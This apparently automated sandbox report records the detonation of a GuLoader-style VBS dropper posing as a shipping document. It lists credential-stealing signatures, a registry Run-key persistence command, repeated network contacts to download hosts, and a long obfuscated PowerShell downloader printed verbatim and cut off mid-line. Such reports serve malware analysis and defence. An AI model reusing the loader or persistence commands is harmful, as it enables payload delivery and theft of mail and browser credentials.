betonk,Honilyj$FrostieSHuma.eaidattosrmhandf.sotolversnIrreguliSinistre RadiossPantheo)Jola,ta ');Skuffemblers80 $Anticivil;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Droh.Lit && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antodontalgic" /t REG_EXPAND_SZ /d "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\Sojaskraaets\').Afdryp;%Peritenon% ($Intermorainic)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antodontalgic" /t REG_EXPAND_SZ /d "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\Sojaskraaets\').Afdryp;%Peritenon% ($Intermorainic)"

Network

Country Destination Domain Proto
US 8.8.8.8:53 6777.6777.6777.677e udp
US 8.8.8.8:53 madibarohilalatwo.duckdns.org udp
DE 84.247.187.12:80 madibarohilalatwo.duckdns.org tcp
US 8.8.8.8:53 cadenaderegalos.com udp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp

Files

memory/2128-4-0x000007FEF614E000-0x000007FEF614F000-memory.dmp

memory/2128-5-0x000000001B6B0000-0x000000001B992000-memory.dmp

memory/2128-6-0x0000000002790000-0x0000000002798000-memory.dmp

memory/2128-7-0x000007FEF5E90000-0x000007FEF682D000-memory.dmp

memory/2128-8-0x000007FEF5E90000-0x000007FEF682D000-memory.dmp

memory/2128-9-0x000007FEF5E90000-0x000007FEF682D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XWS8BUWVGIW67HF3TBJR.temp

MD5 66d985eb027b5bd8ea22c6fdc91246b9
SHA1 a7bf7fe0725a3fe299f3d4efb1699ea288bde3a2
SHA256 ccee5f4135c12fd0afdf18341162d3f475196c3e09752d12a0b82a3524b37c65
SHA512 68c62a7a48e7be300540911e838104afd02af4dc6e437394f9cbdb1208c6a750d4512d0b764ff71a3ecadd3231ff760f3fdb851c2b3d933497857c571eae8682

C:\Users\Admin\AppData\Roaming\Droh.Lit

MD5 1a958060ba3e3de4653959fe2fd1efd5
SHA1 c5d3a5646dc5920668f1f61c334c7c7d40c888b5
SHA256 268dacbaea80bdf0e4ffcbcf21ce4558988d4c77f2906d571a5a1b9db9dc17ab
SHA512 8ba4e481b0a08940a5423abc5d1e7ffa01e4aa185536af215a43e5d28ee025f5caf5355514b2a13f0565c42796e1bd864104878d79d086a82648b0733929c5d0

memory/2672-15-0x0000000006670000-0x0000000008F39000-memory.dmp

memory/2128-16-0x000007FEF5E90000-0x000007FEF682D000-memory.dmp

memory/2128-17-0x000007FEF614E000-0x000007FEF614F000-memory.dmp

memory/1320-19-0x0000000001000000-0x0000000002062000-memory.dmp

memory/2128-26-0x000007FEF5E90000-0x000007FEF682D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-21 14:45

Reported

2024-05-21 14:48

Platform

win10v2004-20240508-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21052024_1445_Shipping Document.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Program Files (x86)\windows mail\wab.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Antodontalgic = "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\\Sojaskraaets\\').Afdryp;%Peritenon% ($Intermorainic)" C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5064 wrote to memory of 2276 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 5064 wrote to memory of 2276 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2276 wrote to memory of 3040 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2276 wrote to memory of 3040 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 5064 wrote to memory of 1556 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5064 wrote to memory of 1556 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1556 wrote to memory of 2644 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 2644 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 4900 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1556 wrote to memory of 4900 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1556 wrote to memory of 4900 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4900 wrote to memory of 636 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4900 wrote to memory of 636 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4900 wrote to memory of 636 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4900 wrote to memory of 2160 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4900 wrote to memory of 2160 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4900 wrote to memory of 2160 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4900 wrote to memory of 2160 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4900 wrote to memory of 2160 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2160 wrote to memory of 1576 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2160 wrote to memory of 1576 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2160 wrote to memory of 1576 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 1576 wrote to memory of 4276 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1576 wrote to memory of 4276 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1576 wrote to memory of 4276 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2160 wrote to memory of 4924 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2160 wrote to memory of 4924 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2160 wrote to memory of 4924 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2160 wrote to memory of 4924 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2160 wrote to memory of 2256 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2160 wrote to memory of 2256 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2160 wrote to memory of 2256 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2160 wrote to memory of 2256 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2160 wrote to memory of 1204 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2160 wrote to memory of 1204 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2160 wrote to memory of 1204 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2160 wrote to memory of 1204 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21052024_1445_Shipping Document.vbs"

C:\Windows\System32\cmd.exe

cmd.exe /c ping 6777.6777.6777.677e

C:\Windows\system32\PING.EXE

ping 6777.6777.6777.677e

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Dokumentationsniveaus = 1;$Hjemegn='Sub';$Hjemegn+='strin';$Hjemegn+='g';Function Pugmiller27($Afficerer){$Fjaserierne=$Afficerer.Length-$Dokumentationsniveaus;For($Semimythically=7;$Semimythically -lt $Fjaserierne;$Semimythically+=8){$Formidabel+=$Afficerer.$Hjemegn.Invoke( $Semimythically, $Dokumentationsniveaus);}$Formidabel;}function Skuffemblers80($Nundination){& ($Fiberizes) ($Nundination);}$Riches=Pugmiller27 'Unfea iMGert,udote.zinazidemndeiSkulderlKejserelKullereaM,squaw/ ranule5Uv.denh.Indsigt0 Teapoy Apsisex(ForsamlWVermicuiNrbanekn Opkal,d SkoleeoD.pnoouwDe.icatsBrushwo PreintoNBnkeradTSurdent Unceles1Tyndta.0Sco,ogg. Drm ea0Interwr; Papegj U.kikkeWPresse iBaggingnPhenopl6Moskgae4Rystnin;Cor.ado EnteroxProgram6Fleligt4Sco nin; Minesw Trif.crU,ikresvIffritt:Gigoloe1 fdestu2Dreamer1Skridso. Stoppe0 rg jle)Diatom. Biog.apGDrivbnkeDietalacTonkawakParenteoAdditum/Anjo mo2A.rmong0Bayrern1hypotak0befordr0Sabb,ti1Eksamen0Teltsla1Seksten UdvideFattraktiChol.dorDrawcaneStrmperfIffcoluoT dstavxAmphict/Coe.uca1Geologi2Discipl1App,rte. Job,gn0D.hydro ';$hermae=Pugmiller27 'CivilisUBefohsfsBjergtoeBe,onkorforlyst-DykkedeAForflytgVicedireKassatin vsprintFllesud ';$Klippespalternes=Pugmiller27 'Recoillh StringtPist rstMercer pUninfri:Fright./tel mec/BrabblimWrannyfa LinenidPogoniaiOver apbBeraabea,lirtatrAn.iqueoMellemrhNonfluii.mpalealPejlevoaTermin lArithmoa Cari.ot BellahwTidssero Harpoo.VanddradPennefjuIsocy ncPaakldek Moorhed Selvbyn.sentrosMessing.Sele,ogomarkedsr Arti egKuldslo/L,vetraaOverspelMa,nedsl Fo,bru/ChristeOreassumvForgr beTikroner ethavepFoilingrBilophuoHar isttPrivataeUnkindlcDieucontTetraheeVilipendAuto.at.BrtternaPaduanisHurtigvdKnownsb>grundprhUnsu,pltReaffiltFreewompDren hesPamphar: Optje./ Kendin/Rigsar.csolilo a HelgesdFranckceLatinamnMundgodaOvercledcutleriePi,dymcr Forstre Vandfog Allitea.mhyggelHen,ikkoDiatonisGunsh t.IsagogicHortikuoKorskirm Fortri/HelmintO SamlinvIsoc ateForbo.sr kursusp Alc horDi,konioParopsitBrokkaseRegrassc KlebrntVaccinaeAchigandDmninge. DiskanaBal,erdsDampededMisc nc ';$Indeksnavnenes=Pugmiller27 'Horeu,g> Neckb. ';$Fiberizes=Pugmiller27 ' AsperiiUnderlaeUdslusax.ialogu ';$unfashionably='Underste';$Ndringsloven = Pugmiller27 'VernacueAntistrcFornufthKu.isshoEstabli Unlamen%YvindasaAfstr.spEvaporapFirspand K shmia CircumtStalagmaSolvarm%trichin\T gthusDFestdagrOuttopiothackerh Dronis.G.ggereL Bem.leiKonsul tDisbury Mimusop&unjo tl& Unrefr ExclusieP,ovedicPa aesthPholioto Boroca NonmanutHousebo ';Skuffemblers80 (Pugmiller27 ' Brevve$Sibyllig E.keltlasylth,oBo.genebAphanesaNonm.rrlstedfas: sermonRHjemvisaErgotizaTyp,husgPastelfeBrightnr BravoenSold teeOwl ike=unplaya(Overcolc mbitiomPaternid,ersali Idealit/ Sprackc tekedy Westli$System.NPhotomud registrDetermiiPistrixnTr.thsmgTomensvsThu.nidltilkendoSkarnbtvStyrekae.andelsn.ongres)R.ndvis ');Skuffemblers80 (Pugmiller27 'Gullery$BasilikgOntologll enabloMembranbCommulaaReprodulHjarnea:RuefulnI SaxaulnSkyd.spdBrugerdsDyrepareParkerinKbenhavs astodo=St dent$WummanaKU,etemallasterni.mutterpfam,etcpObjektke ApoteksS miwoopHolishkaPh tolalovergo,tFlberieeThirtyirMinisten,rydreheKn.vsmesNeder.e.AlarmsysChrist.pSt rgeolWhiteshiPr endetProsaen(Menings$K.lkulaIKvadratnIn.ectid AnteceeNonascekDigitissFortrngnPicturiaudbruddv SpulinnReguarde Positin Mowedee,pachets,acefor)Affodre ');$Klippespalternes=$Indsens[0];$Konstantnavn= (Pugmiller27 ',yrebes$Beboedeg A,rsoplObtestioLnniveab C ntriaHerm.lil Dr.van:K igsmaK Rec mpaDuksedrmBroekdee ,nderueFolk,krnApprokssWaiseja=OtogeniNSpi ekkeLangeelw T.angs-FlleskoOAlmachsb Raspedj SkittleKillybecKi,debatJordarv .dresseS i.deteyAgrologsJagterntSemiboue HissermSlu bet. SubfesNSubemareOmraadetSaliggr.UniseriWsh pyareOxytocib W stelCUneve,tlArkfdniiDaasellehave.usnreptilit');$Konstantnavn+=$Raagerne[1];Skuffemblers80 ($Konstantnavn);Skuffemblers80 (Pugmiller27 'Geother$W,odburKIntercaaSpytkirmMusicaleFormalieStoppegn,uperdesdiminut.snevejrHSammenseRewrit,a Nonundd Unskele Gtefolr brusqusSkattep[Desa in$C.rrupthOmbreudePlemoc,r Dobbelm DisomaaCalandeeIndif e]Saltant= Tri ul$Cons,raR krdderiSouthercPrognoshTe,moeleHalvakssMe.amor ');$Tripotassium=Pugmiller27 ' Pakist$NondecaKSpidsfiaComm.ndmEpriseteCorrespe MysticnTekstilsfkalieo.Beb,erdDUn,roroospan,shwWallisen JennielSelvbedoBrndvrdaInversedevadingFf stooniTrst.splGaulicwe.versig(grubers$Sad lecKM oledelH.lvstui krep,apGipsdeppJugglineGodken,sAngelinpScund ra SinterlRaffeeptOxamidie Gr.vkerBelaaninSugefiseIndrmmes Convey,Pupilla$ ,udekoUN.kedrmdUnabusilTilgodebBodenbesM.ddeltd Forjuda VasenbtAphrasioSprydsteUdsoninnVederhfsPloejer) Colpoh ';$Udlbsdatoens=$Raagerne[0];Skuffemblers80 (Pugmiller27 'Nabobye$UnsandagNonuncil OverdioKurs ikbtrianguaFore.oolBu dend:Aa.ningCLatou.saTempelrrI,ternayNonmen o Sp 